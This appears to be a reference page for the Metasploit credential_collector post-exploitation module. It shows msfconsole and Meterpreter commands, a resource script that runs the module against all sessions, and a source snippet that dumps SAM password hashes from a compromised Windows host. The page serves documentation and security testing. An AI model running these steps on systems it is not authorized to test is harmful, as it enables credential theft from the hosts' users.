Windows Gather Credential Collector - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/credential_collector metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Credential Collector
Module: post/windows/gather/credentials/credential_collector
Source code: modules/post/windows/gather/credentials/credential_collector.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module harvests credentials found on the host and stores them in the database.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/credential_collector

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/credential_collector
msf post(credential_collector) > show options
    ... show and set options ...
msf post(credential_collector) > set SESSION session-id
msf post(credential_collector) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/credential_collector")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/credential_collector post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/credential_collector

msf6 post(windows/gather/credentials/credential_collector) > show info

       Name: Windows Gather Credential Collector
     Module: post/windows/gather/credentials/credential_collector
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  tebo <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module harvests credentials found on the host and stores them 
  in the database.

Module Options


This is a complete list of options available in the windows/gather/credentials/credential_collector post exploitation module:

msf6 post(windows/gather/credentials/credential_collector) > show options

Module options (post/windows/gather/credentials/credential_collector):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/credential_collector post exploitation module:

msf6 post(windows/gather/credentials/credential_collector) > show advanced

Module advanced options (post/windows/gather/credentials/credential_collector):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/credential_collector module can do:

msf6 post(windows/gather/credentials/credential_collector) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/credential_collector post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/credential_collector) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Error accessing hashes, did you migrate to a process that matched the target's architecture?


Here is a relevant code snippet related to the "Error accessing hashes, did you migrate to a process that matched the target's architecture?" error message:

36:	
37:	    # It wasn't me mom! Stinko did it!
38:	    begin
39:	      hashes = client.priv.sam_hashes
40:	    rescue
41:	      print_error('Error accessing hashes, did you migrate to a process that matched the target\'s architecture?')
42:	      return
43:	    end
44:	
45:	    # Target infos for the db record
46:	    addr = session.session_host

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • tebo[at]attackresearch.com

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.